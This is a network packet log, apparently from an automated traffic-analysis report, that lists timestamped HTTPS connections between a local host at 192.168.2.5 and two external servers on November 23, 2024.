                                                                                                                                                                                          Nov 23, 2024 17:44:52.508150101 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.508171082 CET49794443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.508181095 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.508213043 CET49794443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.508223057 CET49794443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.550898075 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.550925970 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.551112890 CET49794443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.551120996 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.551147938 CET49794443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.551163912 CET49794443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.670011997 CET443498022.18.109.164192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.670085907 CET443498022.18.109.164192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.670774937 CET49802443192.168.2.52.18.109.164
                                                                                                                                                                                          Nov 23, 2024 17:44:52.674113035 CET49802443192.168.2.52.18.109.164
                                                                                                                                                                                          Nov 23, 2024 17:44:52.674130917 CET443498022.18.109.164192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.674241066 CET49802443192.168.2.52.18.109.164
                                                                                                                                                                                          Nov 23, 2024 17:44:52.674249887 CET443498022.18.109.164192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.675950050 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.675986052 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.676039934 CET49794443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.676050901 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.676095009 CET49794443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.711136103 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.711163044 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.711261034 CET49794443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.711273909 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.711323023 CET49794443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.740211964 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.740235090 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.740288973 CET49794443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.740298986 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.740324020 CET49794443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.740339994 CET49794443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.758269072 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.758291006 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.758472919 CET49794443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.758481979 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.758575916 CET49794443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.789625883 CET4434980113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.789684057 CET4434980113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.789705038 CET4434980113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.789777994 CET4434980113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.789818048 CET4434980113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.789915085 CET49801443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.789959908 CET4434980113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.789987087 CET49801443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.790163994 CET49801443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.869409084 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.869431973 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.869498968 CET49794443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.869508982 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.869544029 CET49794443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.869560003 CET49794443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.885274887 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.885298014 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.885360956 CET49794443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.885370970 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.885405064 CET49794443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.885427952 CET49794443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.902324915 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.902343035 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.902411938 CET49794443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.902420044 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.902569056 CET49794443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.918137074 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.918183088 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.918251038 CET49794443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.918266058 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.918332100 CET49794443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.931936026 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.931953907 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.932024956 CET49794443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.932034016 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.932094097 CET49794443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.934084892 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.934139967 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.934201956 CET49794443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.934211969 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.991491079 CET4434980113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.991555929 CET4434980113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.991590023 CET49801443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.991628885 CET49801443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.991656065 CET4434980113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.991709948 CET49801443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.999281883 CET4434980113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:53.046530008 CET49801443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:53.046876907 CET4434980113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:53.046957970 CET4434980113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:53.046983957 CET49801443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:53.047008991 CET4434980113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:53.047059059 CET49801443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:53.047060013 CET49801443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:53.114181042 CET4434980113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:53.114243031 CET49801443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:53.114250898 CET4434980113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:53.114286900 CET4434980113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:53.114335060 CET49801443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:53.115015030 CET49801443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:53.115029097 CET4434980113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:53.139343023 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:53.140006065 CET49794443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:53.401645899 CET49811443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:53.401684046 CET4434981113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:53.401814938 CET49811443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:53.402369976 CET49811443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:53.402384043 CET4434981113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:54.020549059 CET4434980613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:54.021716118 CET49806443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:54.021734953 CET4434980613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:54.028501987 CET49806443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:54.028507948 CET4434980613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:54.045074940 CET4434980413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:54.045644045 CET49804443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:54.045660973 CET4434980413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:54.046087027 CET49804443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:54.046092033 CET4434980413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:54.148129940 CET4434980513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:54.148669958 CET49805443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:54.148690939 CET4434980513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:54.149175882 CET49805443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:54.149182081 CET4434980513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:54.202773094 CET4434980713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:54.203361988 CET49807443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:54.203376055 CET4434980713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:54.203957081 CET49807443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:54.203960896 CET4434980713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:54.257217884 CET4434980813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:54.258332014 CET49808443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:54.258393049 CET4434980813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:54.258826971 CET49808443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:54.258841991 CET4434980813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:54.463232040 CET4434980613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:54.463320017 CET4434980613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:54.463363886 CET49806443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:54.463850975 CET49806443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:54.463866949 CET4434980613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:54.463886023 CET49806443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:54.463891983 CET4434980613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:54.470949888 CET49812443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:54.471004963 CET4434981213.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:54.471126080 CET49812443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:54.477746964 CET49812443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:54.477762938 CET4434981213.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:54.537108898 CET4434980413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:54.537190914 CET4434980413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:54.537308931 CET49804443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:54.537461042 CET49804443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:54.537475109 CET4434980413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:54.537484884 CET49804443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:54.537489891 CET4434980413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:54.540420055 CET49813443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:54.540453911 CET4434981313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:54.540580988 CET49813443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:54.540750027 CET49813443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:54.540765047 CET4434981313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:54.604094028 CET4434980513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:54.604187012 CET4434980513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:54.604485035 CET49805443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:54.604518890 CET49805443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:54.604518890 CET49805443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:54.604533911 CET4434980513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:54.604542971 CET4434980513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:54.608763933 CET49814443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:54.608787060 CET4434981413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:54.608885050 CET49814443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:54.609040976 CET49814443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:54.609052896 CET4434981413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:54.696683884 CET4434980713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:54.696865082 CET4434980713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:54.696993113 CET49807443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:54.697029114 CET49807443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:54.697037935 CET4434980713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:54.697048903 CET49807443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:54.697053909 CET4434980713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:54.700206041 CET49815443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:54.700238943 CET4434981513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:54.700417995 CET49815443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:54.700584888 CET49815443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:54.700598001 CET4434981513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:54.711085081 CET4434980813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:54.711287022 CET4434980813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:54.711369038 CET49808443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:54.711464882 CET49808443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:54.711464882 CET49808443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:54.711518049 CET4434980813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:54.711546898 CET4434980813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:54.713901997 CET49816443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:54.713952065 CET4434981613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:54.714135885 CET49816443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:54.714297056 CET49816443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:54.714313030 CET4434981613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:55.199174881 CET4434981113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:55.199537039 CET49811443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:55.199552059 CET4434981113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:55.200977087 CET4434981113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:55.201045990 CET49811443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:55.201493025 CET49811443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:55.201570034 CET4434981113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:55.201728106 CET49811443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:55.201734066 CET4434981113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:55.251648903 CET49811443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:55.705780029 CET4434981113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:55.705849886 CET4434981113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:55.705869913 CET4434981113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:55.705914021 CET4434981113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:55.705926895 CET49811443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:55.705945015 CET4434981113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:55.705965042 CET4434981113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:55.705975056 CET49811443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:55.705992937 CET49811443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:55.706017971 CET49811443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:55.878377914 CET4434981113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:55.878410101 CET4434981113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:55.878469944 CET4434981113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:55.878541946 CET49811443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:55.878550053 CET4434981113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:55.878561020 CET49811443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:55.922842979 CET49811443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:55.935059071 CET4434981113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:55.935106039 CET4434981113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:55.935175896 CET49811443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:55.935180902 CET4434981113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:55.935230970 CET49811443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:55.961688995 CET4434981113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:55.961775064 CET4434981113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:55.961944103 CET49811443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:55.993971109 CET49811443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:55.993983030 CET4434981113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:56.284637928 CET4434981213.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:56.285657883 CET49812443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:56.285686970 CET4434981213.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:56.286426067 CET49812443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:56.286433935 CET4434981213.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:56.398075104 CET4434981313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:56.398675919 CET49813443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:56.398710966 CET4434981313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:56.399275064 CET49813443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:56.399281025 CET4434981313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:56.494426966 CET4434981513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:56.494934082 CET49815443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:56.494951010 CET4434981513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:56.495543957 CET49815443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:56.495548964 CET4434981513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:56.514888048 CET4434981413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:56.515356064 CET49814443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:56.515381098 CET4434981413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:56.515783072 CET49814443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:56.515789986 CET4434981413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:56.518856049 CET4434981613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:56.519264936 CET49816443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:56.519294024 CET4434981613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:56.519778013 CET49816443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:56.519783974 CET4434981613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:56.735224009 CET4434981213.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:56.735279083 CET4434981213.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:56.735332966 CET49812443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:56.735579014 CET49812443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:56.735599995 CET4434981213.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:56.735614061 CET49812443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:56.735620975 CET4434981213.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:56.738857031 CET49826443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:56.738900900 CET4434982613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:56.738966942 CET49826443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:56.739183903 CET49826443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:56.739198923 CET4434982613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:56.852730989 CET4434981313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:56.852886915 CET4434981313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:56.852946043 CET49813443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:56.853142977 CET49813443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:56.853163958 CET4434981313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:56.853176117 CET49813443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:56.853180885 CET4434981313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:56.857161999 CET49827443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:56.857189894 CET4434982713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:56.857269049 CET49827443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:56.857628107 CET49827443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:56.857637882 CET4434982713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:56.942274094 CET4434981513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:56.942339897 CET4434981513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:56.942388058 CET49815443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:56.942629099 CET49815443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:56.942639112 CET4434981513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:56.942648888 CET49815443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:56.942653894 CET4434981513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:56.946014881 CET49828443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:56.946043968 CET4434982813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:56.946114063 CET49828443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:56.946357012 CET49828443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:56.946369886 CET4434982813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:56.966403961 CET4434981613.107.246.63192.168.2.5
